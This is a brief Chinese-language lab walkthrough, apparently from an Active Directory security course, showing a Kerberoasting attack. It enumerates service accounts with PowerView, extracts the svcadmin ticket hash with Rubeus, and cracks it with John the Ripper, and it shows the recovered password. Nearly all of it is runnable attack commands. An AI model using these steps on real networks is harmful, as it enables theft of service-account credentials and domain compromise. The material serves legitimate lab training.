任务
使用kerberoast攻击 破解密码找到SQL Server 服务账户
找出以用户帐户运行的服务以及以机器帐户运行的服务
. C:\AD\Tools\PowerView.ps1Get-DomainUser -SPN
使用Rubeus得到svcadmin account的hash
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt删除hashes.txt的:1433
用john爆破密码
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt*ThisisBlasphemyThisisMadness!!
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
